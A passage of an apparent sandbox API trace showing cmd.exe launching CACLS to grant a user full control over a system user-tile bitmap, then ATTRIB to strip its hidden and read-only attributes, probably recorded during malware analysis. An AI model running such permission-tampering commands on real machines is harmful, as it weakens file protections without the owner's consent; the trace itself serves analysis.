lpcbData=0x12ed40*=0x1000) returned 0x2 [0187.413] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12ed44, lpData=0x12ed48, lpcbData=0x12ed40*=0x1000 | out: lpType=0x12ed44*=0x4, lpData=0x12ed48*=0x1, lpcbData=0x12ed40*=0x4) returned 0x0 [0187.413] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12ed44, lpData=0x12ed48, lpcbData=0x12ed40*=0x1000 | out: lpType=0x12ed44*=0x0, lpData=0x12ed48*=0x1, lpcbData=0x12ed40*=0x1000) returned 0x2 [0187.413] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12ed44, lpData=0x12ed48, lpcbData=0x12ed40*=0x1000 | out: lpType=0x12ed44*=0x4, lpData=0x12ed48*=0x0, lpcbData=0x12ed40*=0x4) returned 0x0 [0187.413] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12ed44, lpData=0x12ed48, lpcbData=0x12ed40*=0x1000 | out: lpType=0x12ed44*=0x4, lpData=0x12ed48*=0x40, lpcbData=0x12ed40*=0x4) returned 0x0 [0187.414] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12ed44, lpData=0x12ed48, lpcbData=0x12ed40*=0x1000 | out: lpType=0x12ed44*=0x4, lpData=0x12ed48*=0x40, lpcbData=0x12ed40*=0x4) returned 0x0 [0187.414] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12ed44, lpData=0x12ed48, lpcbData=0x12ed40*=0x1000 | out: lpType=0x12ed44*=0x0, lpData=0x12ed48*=0x40, lpcbData=0x12ed40*=0x1000) returned 0x2 [0187.414] RegCloseKey (hKey=0x40) returned 0x0 [0187.414] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12ed3c | out: phkResult=0x12ed3c*=0x40) returned 0x0 [0187.414] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12ed44, lpData=0x12ed48, lpcbData=0x12ed40*=0x1000 | out: lpType=0x12ed44*=0x0, lpData=0x12ed48*=0x40, lpcbData=0x12ed40*=0x1000) returned 0x2 [0187.414] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12ed44, lpData=0x12ed48, lpcbData=0x12ed40*=0x1000 | out: lpType=0x12ed44*=0x4, lpData=0x12ed48*=0x1, lpcbData=0x12ed40*=0x4) returned 0x0 [0187.414] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12ed44, lpData=0x12ed48, lpcbData=0x12ed40*=0x1000 | out: lpType=0x12ed44*=0x0, lpData=0x12ed48*=0x1, lpcbData=0x12ed40*=0x1000) returned 0x2 [0187.414] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12ed44, lpData=0x12ed48, lpcbData=0x12ed40*=0x1000 | out: lpType=0x12ed44*=0x4, lpData=0x12ed48*=0x0, lpcbData=0x12ed40*=0x4) returned 0x0 [0187.414] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12ed44, lpData=0x12ed48, lpcbData=0x12ed40*=0x1000 | out: lpType=0x12ed44*=0x4, lpData=0x12ed48*=0x9, lpcbData=0x12ed40*=0x4) returned 0x0 [0187.414] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12ed44, lpData=0x12ed48, lpcbData=0x12ed40*=0x1000 | out: lpType=0x12ed44*=0x4, lpData=0x12ed48*=0x9, lpcbData=0x12ed40*=0x4) returned 0x0 [0187.414] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12ed44, lpData=0x12ed48, lpcbData=0x12ed40*=0x1000 | out: lpType=0x12ed44*=0x0, lpData=0x12ed48*=0x9, lpcbData=0x12ed40*=0x1000) returned 0x2 [0187.414] RegCloseKey (hKey=0x40) returned 0x0 [0187.414] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886395 [0187.414] srand (_Seed=0x5b886395) [0187.414] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp\"" [0187.414] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp\"" [0187.414] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0187.414] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x261a68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0187.415] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0187.415] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0187.415] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0187.415] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0187.415] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0187.415] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0187.415] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0187.415] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0187.415] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0187.415] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0187.415] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0187.415] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0187.415] GetEnvironmentStringsW () returned 0x262458* [0187.415] FreeEnvironmentStringsW (penv=0x262458) returned 1 [0187.415] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0187.415] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0187.415] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0187.415] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0187.415] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0187.415] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0187.415] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0187.415] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0187.415] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0187.415] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0187.415] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12fb08 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0187.415] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x12fb08, lpFilePart=0x12fb04 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x12fb04*="Desktop") returned 0x18 [0187.415] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0187.416] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x12f884 | out: lpFindFileData=0x12f884) returned 0x260ae8 [0187.416] FindClose (in: hFindFile=0x260ae8 | out: hFindFile=0x260ae8) returned 1 [0187.416] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x12f884 | out: lpFindFileData=0x12f884) returned 0x260ae8 [0187.416] FindClose (in: hFindFile=0x260ae8 | out: hFindFile=0x260ae8) returned 1 [0187.416] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x12f884 | out: lpFindFileData=0x12f884) returned 0x260ae8 [0187.416] FindClose (in: hFindFile=0x260ae8 | out: hFindFile=0x260ae8) returned 1 [0187.416] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0187.416] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0187.416] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0187.416] GetEnvironmentStringsW () returned 0x260308* [0187.417] FreeEnvironmentStringsW (penv=0x260308) returned 1 [0187.417] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0187.417] GetConsoleOutputCP () returned 0x1b5 [0187.417] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0187.417] GetUserDefaultLCID () returned 0x409 [0187.417] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0187.417] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12fc48, cchData=128 | out: lpLCData="0") returned 2 [0187.418] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x12fc48, cchData=128 | out: lpLCData="0") returned 2 [0187.418] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x12fc48, cchData=128 | out: lpLCData="1") returned 2 [0187.418] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0187.418] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0187.418] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0187.418] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0187.418] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0187.418] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0187.418] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0187.418] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0187.418] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0187.418] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0187.418] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0187.419] GetConsoleTitleW (in: lpConsoleTitle=0x2509b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0187.419] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0187.419] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0187.419] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0187.419] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0187.420] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0187.421] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0187.421] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0187.421] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0187.421] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0187.421] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0187.421] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0187.421] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0187.425] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0187.425] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0187.425] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0187.425] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0187.425] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0187.425] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0187.425] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0187.427] GetConsoleTitleW (in: lpConsoleTitle=0x12f8dc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0187.427] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0187.427] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0187.427] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0187.427] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0187.427] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0187.427] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0187.427] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0187.427] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0187.427] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0187.427] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0187.427] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0187.427] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0187.427] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0187.427] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0187.427] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0187.427] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0187.427] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0187.427] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0187.427] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0187.427] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0187.427] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0187.427] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0187.427] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0187.427] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0187.428] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0187.428] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0187.428] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0187.428] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0187.428] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0187.428] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0187.428] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0187.428] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0187.428] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0187.428] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0187.428] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0187.428] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0187.428] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0187.428] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0187.428] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0187.428] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0187.428] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0187.428] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0187.428] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0187.428] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0187.428] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0187.428] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0187.428] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0187.428] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0187.428] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0187.428] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0187.428] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0187.428] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0187.428] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0187.428] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0187.428] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0187.428] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0187.428] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0187.428] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0187.428] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0187.428] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0187.428] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0187.428] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0187.428] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0187.428] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0187.428] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0187.428] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0187.428] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0187.428] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0187.428] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0187.428] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0187.428] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0187.428] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0187.428] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0187.429] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0187.429] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0187.429] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0187.429] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0187.429] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0187.429] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0187.429] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0187.429] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0187.429] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0187.429] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0187.429] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0187.429] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0187.429] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0187.429] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0187.429] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0187.430] SetErrorMode (uMode=0x0) returned 0x0 [0187.430] SetErrorMode (uMode=0x1) returned 0x0 [0187.430] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x261e98, lpFilePart=0x12f3fc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x12f3fc*="Desktop") returned 0x18 [0187.430] SetErrorMode (uMode=0x0) returned 0x1 [0187.430] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0187.430] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0187.435] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0187.436] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x12f178, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f178) returned 0xffffffff [0187.436] GetLastError () returned 0x2 [0187.436] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x12f178, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f178) returned 0xffffffff [0187.436] GetLastError () returned 0x2 [0187.436] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x12f178, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f178) returned 0x262180 [0187.437] FindClose (in: hFindFile=0x262180 | out: hFindFile=0x262180) returned 1 [0187.437] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x12f178, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f178) returned 0xffffffff [0187.437] GetLastError () returned 0x2 [0187.437] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x12f178, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f178) returned 0x262180 [0187.437] FindClose (in: hFindFile=0x262180 | out: hFindFile=0x262180) returned 1 [0187.437] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0187.438] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0187.438] GetConsoleTitleW (in: lpConsoleTitle=0x12f670, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0187.438] InitializeProcThreadAttributeList (in: lpAttributeList=0x12f4f8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x12f5c0 | out: lpAttributeList=0x12f4f8, lpSize=0x12f5c0) returned 1 [0187.438] UpdateProcThreadAttribute (in: lpAttributeList=0x12f4f8, dwFlags=0x0, Attribute=0x60001, lpValue=0x12f5b8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x12f4f8, lpPreviousValue=0x0) returned 1 [0187.438] GetStartupInfoW (in: lpStartupInfo=0x12f4b4 | out: lpStartupInfo=0x12f4b4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0187.438] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0187.439] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x12f554*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12f5a0 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x12f5a0*(hProcess=0x50, hThread=0x4c, dwProcessId=0xfe8, dwThreadId=0xa08)) returned 1 [0187.441] CloseHandle (hObject=0x4c) returned 1 [0187.441] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0187.441] GetEnvironmentStringsW () returned 0x260308* [0187.441] FreeEnvironmentStringsW (penv=0x260308) returned 1 [0187.441] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0187.472] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x12f494 | out: lpExitCode=0x12f494*=0x0) returned 1 [0187.472] CloseHandle (hObject=0x50) returned 1 [0187.472] _vsnwprintf (in: _Buffer=0x12f5dc, _BufferCount=0x13, _Format="%08X", _ArgList=0x12f4a0 | out: _Buffer="00000000") returned 8 [0187.472] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0187.472] GetEnvironmentStringsW () returned 0x262410* [0187.472] FreeEnvironmentStringsW (penv=0x262410) returned 1 [0187.472] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0187.472] GetEnvironmentStringsW () returned 0x262410* [0187.472] FreeEnvironmentStringsW (penv=0x262410) returned 1 [0187.472] DeleteProcThreadAttributeList (in: lpAttributeList=0x12f4f8 | out: lpAttributeList=0x12f4f8) [0187.472] GetConsoleTitleW (in: lpConsoleTitle=0x12f8dc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0187.472] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0187.472] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0187.473] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0187.473] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x12f178, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f178) returned 0xffffffff [0187.473] GetLastError () returned 0x2 [0187.473] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x12f178, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f178) returned 0xffffffff [0187.473] GetLastError () returned 0x2 [0187.473] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x12f178, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f178) returned 0x25e4d8 [0187.473] FindClose (in: hFindFile=0x25e4d8 | out: hFindFile=0x25e4d8) returned 1 [0187.473] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x12f178, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f178) returned 0xffffffff [0187.473] GetLastError () returned 0x2 [0187.473] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x12f178, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | 